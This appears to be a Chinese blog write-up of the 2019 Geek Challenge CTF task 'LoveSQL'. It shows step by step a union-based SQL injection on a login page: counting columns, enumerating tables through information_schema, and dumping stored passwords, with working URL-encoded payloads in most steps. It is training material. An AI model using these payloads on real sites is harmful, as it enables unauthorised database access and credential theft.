[极客大挑战 2019]LoveSQL

本文通过实战演示了如何利用SQL注入漏洞获取数据库信息。从发现注入点开始,逐步爆破数据库名、表名及字段名,最终获取关键数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

进入页面,又是一个登录页面,尝试用万能密码登录

登录成功并有回显,并且url也发生了改变 

由此可以看到我们的空格,单引号,#都被转义了,分别转义为空格(%20),单引号(%27),#(%23),先测试一下字段数:/check.php?username=1%27%20order%20by%203%23&password=1

报错了,可能是username不对,虽然回显中使用的是1但是我们不能使用1,修改payload: /check.php?username=admin%27%20order%20by%203%23&password=1

有正确的回显,但是当测试到字段4的时候出了问题:/check.php?username=admin%27%20order%20by%204%23&password=1

现在我们确定一共三个字段了,接下来查询一下测试回显点位:/check.php?username=admin%27%20union%20select%201,2,3%23&password=1

 

又返回了登录页面,没测试出来什么东西,不会又是username出问题了,修改一下username试试:/check.php?username=1%27%20union%20select%201,2,3%23&password=1

得到回显位2和3,再爆破一下数据库:/check.php?username=1%27%20union%20select 1,database(),version()%23&password=1

得到数据库geek,接下来爆表:/check.php?username=1%27%20union%20select 1,2,group_concat(table_name)%20from%20information_schema.tables%20where table_schema=database()%23&password=1

得到geekuser、l0ve1ysq1两个表,爆一下l0ve1ysq1的字段:/check.php?username=1%27%20union%20select%201,2,group_concat(column_name)%20from information_schema.columns%20where%20table_schema=database()%20and table_name='l0ve1ysq1'%23&password=1

猜测flag在password内,爆一下password的数据:/check.php?username=1%27%20union%20select%201,2,group_concat(password)%20from l0ve1ysq1%23&password=1

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值